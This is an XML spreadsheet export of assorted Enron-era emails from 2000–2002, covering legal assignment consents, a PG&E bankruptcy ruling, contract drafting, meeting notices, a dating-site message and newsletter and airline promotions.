A daily visit to "The PMA Jobs Site" at _x000D_
http://www.powermarketers.com/pmajobs.htm connects you to a wealth of power _x000D_
industry opportunities that could supercharge your career!_x000D_
PMA ONLINE MAGAZINE: Access online at: http://www.retailenergy.com/pmamag.htm_x000D_
_x000D_
News releases may be submitted to The PowerMarketers.com Power Report via _x000D_
e-mail to news@powermarketers.com_x000D_
_x000D_
Copyright 2000 by PowerMarketers.com: http://www.powermarketers.com/_x000D_
_x000D_
The PowerMarketers.com Power Report is a complimentary service of The Power _x000D_
Marketing Association. Headlines are copyrighted by their respective _x000D_
services: Reuters, Knight-Ridder, and others._x000D_
_x000D_
Subscriptions to the PowerMarketers.com Power Report are free - you will _x000D_
never be charged. You may redistribute this e-mail without change. You may _x000D_
not redistribute stories. To register for a free subscription, point your _x000D_
browser to: http://www.retailenergy.com/pma/dprreg.htm_x000D_
_x000D_
TO UNSUBSCRIBE OR CHANGE your subscription, (1) point your browser to "The _x000D_
PMA OnLine Power Report" subscription services form at _x000D_
http://www.retailenergy.com/pma/dprreg.htm_x000D_
_x000D_
_x000D_
OR_x000D_
_x000D_
(2) , send a message to pma@powermarketers.com. Include "unsubscribe" in the _x000D_
subject and include your name and email address for confirmation.</t>
  </si>
  <si>
    <t>Thu, 10 Feb 2000 06:09:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Whalley on Vacation</t>
  </si>
  <si>
    <t xml:space="preserve">FYI_x000D_
_x000D_
Vince_x000D_
---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 02/10/2000 _x000D_
02:09 PM ---------------------------_x000D_
_x000D_
_x000D_
Liz M Taylor_x000D_
02/10/2000 10:31 AM_x000D_
To: John J Lavorato/CAL/ECT@ECT, James B Fallon/HOU/ECT@ECT, Jeffrey A _x000D_
Shankman/HOU/ECT@ECT, Louise Kitchen/LON/ECT@ECT, Jere C _x000D_
Overdyke/HOU/ECT@ECT, Vince J Kaminski/HOU/ECT@ECT, Gary _x000D_
Hickerson/HOU/ECT@ECT, George McClellan/HOU/ECT@ECT, Lynda _x000D_
Clemmons/HOU/ECT@ECT, Sally Beck/HOU/ECT@ECT, Wanda Curry/HOU/ECT@ECT, _x000D_
Stephen R Horn/HOU/ECT@ECT, Brian Redmond/HOU/ECT@ECT, Raymond _x000D_
Bowen/HOU/ECT@ECT, Jeff Donahue/HOU/ECT@ECT, David Oxley/HOU/ECT@ECT, Ronald _x000D_
Slimp/HOU/ECT@ECT, Philippe A Bibi/HOU/ECT@ECT, Mark E Haedicke/HOU/ECT@ECT, _x000D_
John Hopley/HOU/ECT@ECT, David W Delainey/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Whalley on Vacation_x000D_
_x000D_
FYI:  Greg Whalley will be on vacation the week of February 14. _x000D_
_x000D_
Many Thanks,_x000D_
_x000D_
Liz Taylor_x000D_
x31935_x000D_
</t>
  </si>
  <si>
    <t>Thu, 13 Dec 2001 16:33:14 -0800 (PST)</t>
  </si>
  <si>
    <t>This is a copy of your message sent to jadedncynical@talkmatch.com --&gt;_x000D_
_x000D_
Hello,_x000D_
_x000D_
I'm volunteering to be your date for your 30th birthday.  Here is my profile, write back and tell me if I made the short list._x000D_
_x000D_
Click the following link to view the sender's profile:_x000D_
http://www.match.com/doubleblind/showprofile.asp?UserID=484948454C4B4E&amp;trackingid=65685_x000D_
_x000D_
The following is my profile text:_x000D_
_x000D_
Hello, I'm a down to earth person that likes to laugh and have a good time. I work in downtown Denver as a commodities trader for a large energy trading house. I do enjoy my career but understand life needs to be kept in prospective and be balanced. I enjoy activities over sitting and watching, but I have been known to sit in front of the TV and watch football or college basketball all day. I'm looking for someone who enjoys life and doesn't take themselves too seriously. _x000D_
_x000D_
*********************************************************_x000D_
_x000D_
ADDITIONAL TIPS from Match.com:_x000D_
_x000D_
Our anonymous re-mailer will strip away your real email address, so _x000D_
that it will NOT appear in the 'From:' line._x000D_
_x000D_
You may also contact this person from their Match.com profile by _x000D_
clicking 'Contact this person' and composing your message directly from the _x000D_
site._x000D_
_x000D_
However:_x000D_
_x000D_
* Check to ensure that your email address is not in the BODY of your _x000D_
message as we are unable to remove these._x000D_
_x000D_
* Check to ensure that you REMOVE ANY AUTOMATIC SIGNATURE at the end of _x000D_
_x000D_
your email. And note that you cannot use 'Cc:' or 'Bcc:' if you want _x000D_
your email to remain anonymous._x000D_
_x000D_
Match.com does not monitor private email between members, nor are we _x000D_
liable for the content of these messages. All members are bound by our _x000D_
Match.com Service Agreement.</t>
  </si>
  <si>
    <t>Thu, 7 Jun 2001 06:59:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Joe:_x000D_
_x000D_
_x000D_
Per Jay's voice mail to you, could you please take a look at the two exhibits _x000D_
attached to the two documents at the bottom of this email and verify the _x000D_
trades with Jay.  MEGA wants to transfer the described financial trades and _x000D_
the ISDA Master Agreement to Morgan Stanley Capital Group Inc..  MEGA is _x000D_
making the same request on the physical side.  Thanks._x000D_
_x000D_
Sara Shackleton_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3801a_x000D_
Houston, Texas  77002_x000D_
713-853-5620 (phone)_x000D_
713-646-3490 (fax)_x000D_
sara.shackleton@enron.com_x000D_
----- Forwarded by Sara Shackleton/HOU/ECT on 06/07/2001 01:43 PM -----_x000D_
_x000D_
	Susan Bailey_x000D_
	06/05/2001 05:40 PM_x000D_
		 _x000D_
		 To: Sara Shackleton/HOU/ECT@ECT, Mary Cook/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Re: Merchant Energy Group of the Americas_x000D_
_x000D_
Sara or Mary,_x000D_
_x000D_
Carol asked that I have one of you handle the following request for the _x000D_
captioned counterparty with respect to the financial consents._x000D_
_x000D_
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++_x000D_
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++_x000D_
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++_x000D_
_x000D_
Carol is handling the consent for EPMI, and set forth below are her _x000D_
instructions to Rhonda Denton with EPMI_x000D_
_x000D_
Rhonda:_x000D_
Enclosed is a clean and marked version of the MEGA Assignment.  Is the plan _x000D_
to confirm these trades under the existing Master with Morgan until a new EEI _x000D_
Master is executed?  What is the cutoff date for this assignment?_x000D_
_x000D_
_x000D_
_x000D_
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++_x000D_
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++_x000D_
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++_x000D_
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++_x000D_
++++++++++++++++++++++++++++++++++++_x000D_
_x000D_
Set forth below is original message I received from the Counterparty _x000D_
requesting such consents.   I originally thought Carol would handle, but she _x000D_
said one of you should handle the financial piece for ENA.   So attached _x000D_
hereto is that orignal message and the proposed consents:_x000D_
_x000D_
_x000D_
	Susan Bailey_x000D_
	05/14/2001 03:12 PM_x000D_
		 _x000D_
		 To: Carol St Clair/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: From MEGA, Consent to Assignment...._x000D_
_x000D_
Carol,_x000D_
_x000D_
Please review message below from Kristina Drew @ Merchant Energy.  I thought _x000D_
you would be the appropriate lawyer to work on this as it involves EPMI as _x000D_
well as a derivative piece with ENA._x000D_
_x000D_
FYI:  the assignment is not of immediate need, being that FERC approval must _x000D_
secured._x000D_
_x000D_
If you do not think this to be the case, please advise as to who should work _x000D_
on this matter._x000D_
_x000D_
_x000D_
Cordially,_x000D_
Susan S. Bailey_x000D_
Enron North America Corp._x000D_
1400 Smith Street, Suite 3806A_x000D_
Houston, Texas 77002_x000D_
Phone: (713) 853-4737_x000D_
Fax: (713) 646-3490_x000D_
E:mail:  Susan.Bailey@enron.com_x000D_
----- Forwarded by Susan Bailey/HOU/ECT on 05/14/2001 03:06 PM -----_x000D_
_x000D_
	"Drew, Kristina" &lt;DrewK@merchantenergy.com&gt;_x000D_
	05/14/2001 03:05 PM_x000D_
		 _x000D_
		 To: "'susan.bailey@enron.com'" &lt;susan.bailey@enron.com&gt;_x000D_
		 cc: "Abba Gana, Mustapha" &lt;AbbaGanaM@merchantenergy.com&gt;_x000D_
		 Subject: From MEGA, Consent to Assignment...._x000D_
_x000D_
_x000D_
Susan,_x000D_
_x000D_
Please find attached for your review, a Consent to Assignment Agreement_x000D_
between us, Enron North America Corporation and Morgan Stanley Capital Group_x000D_
Inc.  We would like to have the document ready to execute at about the same_x000D_
time we execute the Physical Power Consent to Assignment Agreement with_x000D_
Enron Power Marketing, Inc., and we are waiting for FERC approval on the_x000D_
Physical Power Sales as well.  I just wanted to present the agreement to you_x000D_
now, so that if it is necessary, we have time to discuss any concerns.  I_x000D_
look forward to talking with you to work toward the execution of the_x000D_
Agreement._x000D_
_x000D_
 &lt;&lt;ENA (Basis Swap) Assignment Consent Agreement 042501.doc&gt;&gt;_x000D_
&lt;&lt;ENA (Nat Gas) Assignment Consent Agreement 042501.doc&gt;&gt;_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kristina M. Drew_x000D_
Contract Adminstrator_x000D_
Merchant Energy Group of the Americas, Inc._x000D_
410.295.1708_x000D_
_x000D_
_x000D_
 - ENA (Basis Swap) Assignment Consent Agreement 042501.doc_x000D_
 - ENA (Nat Gas) Assignment Consent Agreement 042501.doc_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 14 Mar 2001 04:20:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'robert.sevitz@enron.com'})</t>
  </si>
  <si>
    <t>Re: Coop City</t>
  </si>
  <si>
    <t xml:space="preserve">I'm still on it.  We are still working on the term sheet._x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Robert Sevitz                           03/14/2001 12:10 PM_x000D_
	_x000D_
_x000D_
To: Kay Mann/Corp/Enron@Enron_x000D_
cc: Randy Pais/Corp/Enron@Enron _x000D_
_x000D_
Subject: Coop City_x000D_
_x000D_
Kay_x000D_
_x000D_
Were you involved in the Coop City meeting/conference call this morning, and _x000D_
if so, was any progress made in defining the business deal so that we can get _x000D_
started with documentation?_x000D_
_x000D_
Thanks_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 20 May 2001 04:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'vicki.sharp@enron.com', 'mark.haedicke@enron.com', 'james.derrick@enron.com', 'richard.sanders@enron.com'})</t>
  </si>
  <si>
    <t>Judge's Ruling against Ratepayers Committee</t>
  </si>
  <si>
    <t>Lisa J. Mellencamp_x000D_
Enron North America Corp. - Legal_x000D_
1400 Smith St._x000D_
Houston, TX  77002_x000D_
Tel:  (713) 853-7986_x000D_
Fax: (713) 646-3393_x000D_
E-mail:  Lisa.Mellencamp@enron.com_x000D_
----- Forwarded by Lisa Mellencamp/HOU/ECT on 05/20/2001 11:11 AM -----_x000D_
_x000D_
	AMarks@milbank.com_x000D_
	05/18/2001 06:54 PM_x000D_
		 _x000D_
		 To: PAronzon@milbank.com, DCain@milbank.com, DCreed@milbank.com, _x000D_
MDayen@milbank.com, SDemeo@milbank.com, MDiamond@milbank.com, _x000D_
EFeo@milbank.com, ygonzales@milbank.com, CGooding@milbank.com, _x000D_
SKramer@milbank.com, TKreller@milbank.com, AMarks@milbank.com, _x000D_
KMcspadden@milbank.com, VMoody@milbank.com, RMoore@milbank.com, _x000D_
PNaegely@milbank.com, FNeufeld@milbank.com, LOliveira@milbank.com, _x000D_
JSchwarz@milbank.com, MSorochinsky@milbank.com, CUrquhart@milbank.com, _x000D_
awirum@pillsburywinthrop.com, fallon_annamarie@jpmorgan.com, _x000D_
alafaire@exchange.ml.com, byoung@llgm.com, bgreene2@mail.state.tn.us, _x000D_
bholman@whitecase.com, bkrakauer@sidley.com, fishbcr@whitecase.com, _x000D_
ceklund@llgm.com, clara.strand@bankofamerica.com, dan.faltermeier@dynegy.com, _x000D_
david.adante@davey.com, dnelsen@gwfpower.com, _x000D_
elizabeth.h.baird@bankofamerica.com, lengel@brobeck.com, gbush@bankofny.com, _x000D_
grant_kolling@city.palo-alto.ca.us, gbaer@pillsburywinthrop.com, _x000D_
jostevenson@bankofny.com, jlhuemoe@llgm.com, jwhite@brobeck.com, _x000D_
jbloom@whitecase.com, jpiassick@kilpatrickstockton.com, _x000D_
john.c.herbert@dynegy.com, jklauber@llgm.com, jeisenberg@exchange.ml.com, _x000D_
juhase_kathleen@jpmorgan.com, kcoleman@gibsondunn.com, ksmith@deltapower.com, _x000D_
krussak@pillsburywinthrop.com, lisa.mellencamp@enron.com, _x000D_
michael.tribolet@enron.com, mlurie@exchange.ml.com, mahrens@smrh.com, _x000D_
mhindus@pillsburywinthrop.com, nmillard@whitecase.com, _x000D_
toth_norma@jpmorgan.com, pwarden@pillsburywinthrop.com, _x000D_
robert_b._lynch@chase.com, rblum@thelenreid.com, rkampfner@brobeck.com, _x000D_
srahman@deltapower.com, tponsford@smrh.com, tpatters@sidley.com, _x000D_
tmilne@mail.state.tn.us, wevanoff@sidley.com, _x000D_
allison.m.young@us.pwcglobal.com, gerald.keenan@us.pwcglobal.com, _x000D_
james.drzemiecki@us.pwcglobal.com, jwilson@saybrook.net, _x000D_
jschotz@saybrook.net, jrosenthal@saybrook.net, jthomas@saybrook.net, _x000D_
freddie.reiss@us.pwcglobal.com, margery.a.neis@us.pwcglobal.com, _x000D_
michael.hamilton@us.pwcglobal.com, mjhamilt@bellatlantic.net, _x000D_
rocky.ho@us.pwcglobal.com, tom.lumsden@us.pwcglobal.com, _x000D_
bliden@rogersassoc.com, ccarter@rogersassoc.com, daney@rogersassoc.com, _x000D_
mklink@rogersassoc.com, rrogers@rogersassoc.com, _x000D_
sfischer-holmes@rogersassoc.com_x000D_
		 cc: _x000D_
		 Subject: Judge's Ruling against Ratepayers Committee_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
There will be no Official Committee of Ratepayers in the PG&amp;E bankruptcy _x000D_
case.? Judge Montali issued his order today granting PG&amp;E's motion (in which _x000D_
our Creditors Committee joined), vacating the appointment of the Ratepayers _x000D_
Committee.? _x000D_
_x000D_
The Judge ruled that the Bankruptcy Code does not grant the ratepayers _x000D_
standing as they are not creditors of PG&amp;E, and that there is no statutory _x000D_
authority on which an official ratepayers' committee could be based.? The _x000D_
State Attorney General is capable of addressing consumers' interests in the _x000D_
bankruptcy case.? Individual ratepayers are always free to seek to intervene _x000D_
later on particular issues in which they have an interest.? The Judge made _x000D_
clear that "having an interest in a result (as all ratepayers do) does not _x000D_
rise to the level of having a claim as defined by the Bankruptcy Code."? He _x000D_
noted that "the Bankruptcy Code, and the bankruptcy court, were designed to _x000D_
resolve debtor-creditor problems; state agencies are where issues such as _x000D_
rates for electricity are handled....[T]he estate...should not be burdened _x000D_
with matters likely to be resolved elsewhere."? The ratepayers can take their _x000D_
issues to the CPUC or another forum where regulatory issues are heard._x000D_
_x000D_
Please call us should you have any questions. _x000D_
_x000D_
Regards, _x000D_
_x000D_
Allan _x000D_
______________________________ _x000D_
Allan T. Marks _x000D_
Milbank, Tweed, Hadley &amp; McCloy LLP _x000D_
email:? amarks@milbank.com _x000D_
website:? www.milbank.com? _x000D_
(213) 892-4376 (L.A. telephone) _x000D_
(212) 530-5312 (N.Y. telephone) _x000D_
(213) 892-4739 (L.A. direct fax) _x000D_
(213) 629-5063 (L.A. main fax)????????????????  _x000D_
_x000D_
 &lt;&lt;...&gt;&gt; _x000D_
_x000D_
? &lt;&lt;RatepayersCommMem5-18.pdf&gt;&gt; _x000D_
_x000D_
This e-mail message may contain legally privileged and/or confidential _x000D_
information. If you are not the intended recipient(s), or the employee _x000D_
or agent responsible for delivery of this message to the intended _x000D_
recipient(s), you are hereby notified that any dissemination, _x000D_
distribution or copying of this e-mail message is strictly prohibited. _x000D_
If you have received this message in error, please immediately notify _x000D_
the sender and delete this e-mail message from your computer. _x000D_
_x000D_
_x000D_
 - RatepayersCommMem5-18.pdf</t>
  </si>
  <si>
    <t>Thu, 19 Apr 2001 00:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: MOA - Pompano Beach</t>
  </si>
  <si>
    <t xml:space="preserve">Can you sneak me a copy of the latest draft? Maybe I can negotiate with Ben._x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 04/19/2001 07:01 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Ann Elizabeth White@ECT_x000D_
04/18/2001 06:56 PM_x000D_
To: Roseann Engeldorf/ENRON@enronXgate @ ENRON_x000D_
cc: Herman Manis/ENRON@enronXgate@ENRON, Lisa Bills/ENRON@enronXgate@ENRON, _x000D_
Barbara Gray, Ben Jacoby, Steven Krimsky/Corp/Enron@Enron, Kay _x000D_
Mann/Corp/Enron@Enron _x000D_
_x000D_
Subject: Re: MOA - Pompano Beach  _x000D_
_x000D_
After our meeting, Ben asked me to please delete the phrase "or its _x000D_
designee"  from this draft and, with the assignment language (Section 14), I _x000D_
thought it was clear that there could be a designee (or assignee) if PBEC _x000D_
desired in its sole and absolute discretion._x000D_
_x000D_
I've also spoken to Herman about his concern that I didn't put in an _x000D_
additional Whereas statement that specifically stated that this agreement is _x000D_
not a binding obligation on PBEC's part to build the facility or incur any of _x000D_
the fees addressed. Ben and I also discussed this and I had hoped that adding _x000D_
a Whereas Clause that says "PBEC desires to construct the Facility if it _x000D_
receives all requisite local, city, county, state or federal approvals for _x000D_
development and construction thereof" made it clearly contingent and that, _x000D_
coupled with broad assignment and termination language, would suffice.  As _x000D_
Barbara specifically pointed out at our meeting, the agreement is in fact a _x000D_
binding agreement but the obligations under the agreement are not binding _x000D_
until the conditions subsequent have occurred (being the commencement of _x000D_
construction) and the events of commencement of construction are entirely _x000D_
within PBEC's control._x000D_
_x000D_
I guess I'm not clear as to what the  concern is for adding the word _x000D_
"designee" when the agreement says PBEC has the sole and absolute right to _x000D_
assign to another party, without the City's consent and, if we elect to not _x000D_
build the facility or the agreement otherwise terminates, PBEC is relieved of _x000D_
all obligations under the agreement, which is what is provided for in Section _x000D_
16.d.  I would think that the broad rights of assignment and the absolute _x000D_
release are stronger than just adding the word "designee" in the definition _x000D_
of PBEC._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
From: Roseann Engeldorf/ENRON@enronXgate on 04/18/2001 05:42 PM_x000D_
To: Ann Elizabeth White/HOU/ECT@ECT_x000D_
cc: Herman Manis/ENRON@enronXgate, Lisa Bills/ENRON@enronXgate _x000D_
Subject: MOA - Pompano Beach_x000D_
_x000D_
Ann Elizabeth - I have reviewed the latest draft - is there any reason why we _x000D_
can't add the phrase "or its designee" in the definition of "PBEC"?  Although _x000D_
I understand you have included a broad assignment provision, it helps to _x000D_
include "designee" language to show our compliance with the facility _x000D_
structure. _x000D_
_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Rose_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 19 Oct 2001 14:41:15 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lee.huber@enron.com', 'don.hawkins@enron.com', 'james.centilli@enron.com', 'greek.rice@enron.com', 'mansoor.abdmoulaie@enron.com', 'michael.ratner@enron.com', 'robert.guthrie@enron.com', 'kimberly.watson@enron.com', 'bob.chandler@enron.com', 'morris.brassfield@enron.com'})</t>
  </si>
  <si>
    <t>Questar Southern Trail West Leg due diligence meeting</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
We are planning on meeting on Monday, October 22nd from 10:00 to 11:00 to discuss the Southern Trails Pipeline West Leg data room.  We will meet in EN 1336.  During this meeting, we will discuss:_x000D_
_x000D_
General description of the project_x000D_
_x000D_
What data needs to be requested to be included in the data room_x000D_
_x000D_
Assignments in the data room_x000D_
_x000D_
Timing of visiting the data room_x000D_
_x000D_
Please contact me if you are unable to attend or need to send a substitute representative._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Mark_x000D_
_x000D_
_x000D_
Mark McConnell_x000D_
Transwestern Pipeline Company_x000D_
713-345-7896   office_x000D_
713-822-4862   cell_x000D_
713-646-2551   fax_x000D_
mark.mcconnell@enron.com</t>
  </si>
  <si>
    <t>Tue, 15 Aug 2000 05:32:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lewis.h@enron.com', 'andrew.lewis@enron.com'})</t>
  </si>
  <si>
    <t>Nuke</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Hunter S Shively/HOU/ECT on 08/15/2000 _x000D_
12:31 PM ---------------------------_x000D_
_x000D_
_x000D_
George Hopley_x000D_
08/15/2000 12:02 PM_x000D_
To: Hunter S Shively/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Nuke_x000D_
_x000D_
Please see attached sept nuke schedule_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 29 Oct 2001 08:04:31 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jonathan.mckay@enron.com', 'leonidas.savvas@enron.com', 'scott.goodell@enron.com', 'victoria.versen@enron.com', 'vladi.pimenov@enron.com', 'john.hodge@enron.com', 'chuck.ames@enron.com'})</t>
  </si>
  <si>
    <t>Home address</t>
  </si>
  <si>
    <t>Please send me your home address for east desk records._x000D_
_x000D_
Kimberly Bates_x000D_
East Gas/Origination_x000D_
713-853-5193_x000D_
713-646-8453 Fax</t>
  </si>
  <si>
    <t>Thu, 3 Jan 2002 13:37:16 -0800 (PST)</t>
  </si>
  <si>
    <t>Start Date: 1/3/02; HourAhead hour: 16;</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 1/3/02; HourAhead hour: 16;  No ancillary schedules awarded.  No variances detected. _x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2002010316.txt</t>
  </si>
  <si>
    <t>Tue, 1 May 2001 02:47:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Gas Daily Deals</t>
  </si>
  <si>
    <t xml:space="preserve">Jeff,_x000D_
_x000D_
Attached is a full list of the deals that booked incorrectly._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Errol_x000D_
---------------------- Forwarded by Errol McLaughlin/Corp/Enron on 05/01/2001 _x000D_
09:42 AM ---------------------------_x000D_
From: Dawn C Kenne/ENRON@enronXgate on 04/23/2001 05:01 PM_x000D_
To: Errol McLaughlin/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: FW: Gas Daily Deals_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Kenne, Dawn C.  _x000D_
Sent: Monday, April 23, 2001 4:23 PM_x000D_
To: Gossett, Jeffrey; Denny, Jennifer; Moorer, Torrey_x000D_
Cc: Sweitzer, Tara_x000D_
Subject: Gas Daily Deals_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 6 Feb 2002 18:08:59 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lisa.burnett@enron.com', 'will.smith@enron.com', 'steve.stock@enron.com', 'hilburn.henry@enron.com', 'laura.dewett@enron.com', 'matt.pena@enron.com', 'ganapathy.ramesh@enron.com', 'legal &lt;.hall@enron.com&gt;', 'felicia.ma@enron.com', 'genia.fitzgerald@enron.com', 'bob.hillier@enron.com', 'john.postlethwaite@enron.com', 'paul.lewis@enron.com', 'jeffrey.miller@enron.com', 'bhupesh.nagar@enron.com', 'l..day@enron.com', 'michael.belmont@enron.com', 'ajay.sindwani@enron.com', 'pete.davis@enron.com', 'franky.sulistio@enron.com', 'mable.tang@enron.com', 'michael.robertson@enron.com', 'vijay.gadhavi@enron.com', 'john.anderson@enron.com', 'jim.cashion@enron.com', 'seung-taek.oh@enron.com', 'andrew.champion@enron.com', 'scott.newkirk@enron.com', 'rennu.varghese@enron.com', 'janette.elbertson@enron.com', 'krishna.lattupally@enron.com', 'chris.bowling@enron.com', 'phil.motuzko@enron.com', 'benedicta.tung@enron.com', 'chris.schomer@enron.com', 'joe.errigo@enron.com', 'bala.kandaswamy@enron.com', 'scotty.gilbert@enron.com', 'craig.dean@enron.com', 'jay.webb@enron.com', 'nayan.dattani@enron.com', 'piyush.patel@enron.com', 'sally.beck@enron.com', 'marcus.nettelton@enron.com', 'moyez.lallani@enron.com', 'jayanta.sengupta@enron.com', 'heather.dunton@enron.com', 'stacey.ramsay@enron.com', 'ramesh.rao@enron.com', 'steve.nat@enron.com', 'donna.sheidun@enron.com', 'marci.mansfield@enron.com', 'eugene.lee@enron.com', "romeo.d'souza@enron.com", 'sanjeev.gupta@enron.com', 'louise.kitchen@enron.com', 'cecilia.cheung@enron.com', 'legal &lt;.taylor@enron.com&gt;', 'min.zheng@enron.com', 'suvinay.sinha@enron.com', 'brad.merrell@enron.com', 'robert.laurel@enron.com', 'sonia.hennessy@enron.com', 'christine.dinh@enron.com', 'raghu.burra@enron.com', 'david.dronet@enron.com', 'john.kinser@enron.com', 'don.baughman@enron.com', 'c..koehler@enron.com', 'victoria.sorkina@enron.com', 'jeff.dasovich@enron.com', 'david.portz@enron.com', 'hien.trinh@enron.com', 'hal.mckinney@enron.com', 'michael.swaim@enron.com', 'mark.kinkead@enron.com', 'duong.luu@enron.com', 'norman.lee@enron.com', 'clement.charbonnet@enron.com', 'alan.comnes@enron.com', 'patrick.hanse@enron.com', 'pinto.leite@enron.com', 'christian.yoder@enron.com', 'ajit.dhansinghani@enron.com', 'w..bennett@enron.com', 'ron.nolte@enron.com', 'a..allen@enron.com', 'bill.fortney@enron.com', 'michael.berger@enron.com', 'corry.bentley@enron.com', 'robert.virnau@enron.com', 'cynthia.clark@enron.com', 'andrea.dahlke@enron.com', 'virendra.patel@enron.com', 'm..smith@enron.com', 's..lim@enron.com', 'juan.padron@enron.com', 'tantra.invedy@enron.com', 'shawn.macphail@enron.com', 'todd.walker@enron.com', 'mai.nguyen@enron.com', 'frank.hayden@enron.com', 'casey.evans@enron.com', 'jason.choate@enron.com', 'e..haedicke@enron.com', 'angela.davis@enron.com', 'andrew.hawthorn@enron.com', 'sundar.chitradurga@enron.com', 'm..docwra@enron.com', 'kim.durham@enron.com', 'sivakumar.govindasamy@enron.com', 'albert.meyers@enron.com', 'jim.sugrue@enron.com', 'narasim.kasaru@enron.com', 'lori.boudreaux@enron.com', 'ben.nguyen@enron.com', 'l..garcia@enron.com', 'diane.cutsforth@enron.com', 'michael.mier@enron.com', 'george.wang@enron.com', 'sean.yang@enron.com', 'kelley.huntley@enron.com', 'd..powell@enron.com', 'tony.thomas@enron.com', 'michael.ritacco@enron.com', 'jatinder.dua@enron.com', 'charles.brewer@enron.com', 'michelle.cash@enron.com', 'bryce.schneider@enron.com', 'michael.seely@enron.com', 'genady.batrak@enron.com', 'samuel.blaylock@enron.com', 'jim.meyer@enron.com', 'holden.salisbury@enron.com', 'jaikishore.bharathi@enron.com', 't..hodge@enron.com', 'jayant.krishnaswamy@enron.com', 'jason.stephens@enron.com', 'dan.harrell@enron.com', 'w..white@enron.com', 'jeremy.wong@enron.com', 'david.poston@enron.com', 'ryan.slinger@enron.com', 'ricky.dang@enron.com', 'kenneth.lim@enron.com', 'zhuoming.lou@enron.com', 'd..steffes@enron.com', 'jonathan.ryan@enron.com', 'jessie.wang@enron.com', 'bill.williams@enron.com', 'george.ji@enron.com', 'zhiyong.wei@enron.com', 'suzanne.calcagno@enron.com', 'peter.makkai@enron.com', 'marc.bir@enron.com', 'terris.kyle-watson@enron.com', 'alan.chen@enron.com', 'wayne.vinson@enron.com', 'geir.solberg@enron.com', 'matt.burleigh@enron.com', 'debra.bailey@enron.com', 'marie.heard@enron.com', 'dwayne.peterson@enron.com', 'sudheer.kannantha@enron.com', 'tana.jones@enron.com', 'mark.symms@enron.com', 'tianri.zhu@enron.com', 'leslie.reeves@enron.com', 'anwar.melethil@enron.com'})</t>
  </si>
  <si>
    <t>Mon, 31 Dec 2001 18:37:59 -0800 (PST)</t>
  </si>
  <si>
    <t>OnePass Member continental.com Specials for Jane Tholt</t>
  </si>
  <si>
    <t xml:space="preserve">continental.com Specials for Jane Tholt_x000D_
Tuesday, January 1, 2002_x000D_
****************************************_x000D_
_x000D_
HAPPY NEW YEAR!_x000D_
_x000D_
Continental makes it easy to unwind with an additional 10% off select sale fares to destinations in North America and Europe.  Hurry, seats are limited and this sale ends January 15, 2002._x000D_
_x000D_
Purchase your eTickets now at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc4?JHEVAZ*qmohsmQLgkhgEJht*z*VA_x000D_
_x000D_
_x000D_
EARN UP TO 20,000 BONUS MILES*_x000D_
Now through February 15, 2002, we'll reward you with additional OnePass miles every time you purchase an eTicket on continental.com and fly - and that's in addition to your actual flight miles._x000D_
_x000D_
View all the details and register at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc4?JHEVAZ*qmohsmQLgkhgEJht*z*XA_x000D_
_x000D_
* NOTE: Bonus Mile offer does not apply to continental.com Specials._x000D_
_x000D_
TRAVEL UPDATES_x000D_
Be sure to check continental.com at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc4?JHEVAZ*qmohsmQLgkhgEJht*z*YA_x000D_
before leaving for the airport. We're looking forward to welcoming you onboard!_x000D_
_x000D_
****************************************_x000D_
TABLE OF CONTENTS_x000D_
1. This Week's Destinations_x000D_
2. Hilton Hotels &amp; Resorts, Doubletree Hotels &amp; Resorts, &amp; Embassy Suites Hotels Offers_x000D_
